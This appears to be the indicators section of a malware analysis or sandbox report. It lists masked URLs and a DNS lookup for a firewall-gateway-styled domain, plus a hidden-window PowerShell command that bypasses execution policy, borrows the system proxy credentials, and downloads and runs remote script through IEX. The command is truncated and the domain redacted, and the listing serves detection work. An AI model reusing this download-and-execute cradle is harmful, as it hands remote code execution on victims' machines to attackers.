Technical Information
- http://hp##.###ewall-gateway.net/hpjs.php
- http://hp##.###ewall-gateway.net/login
- http://hp##.###ewall-gateway.net/view/gteokmz-QLHUC
- DNS ASK hp##.###ewall-gateway.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://hp##...' (with hidden window)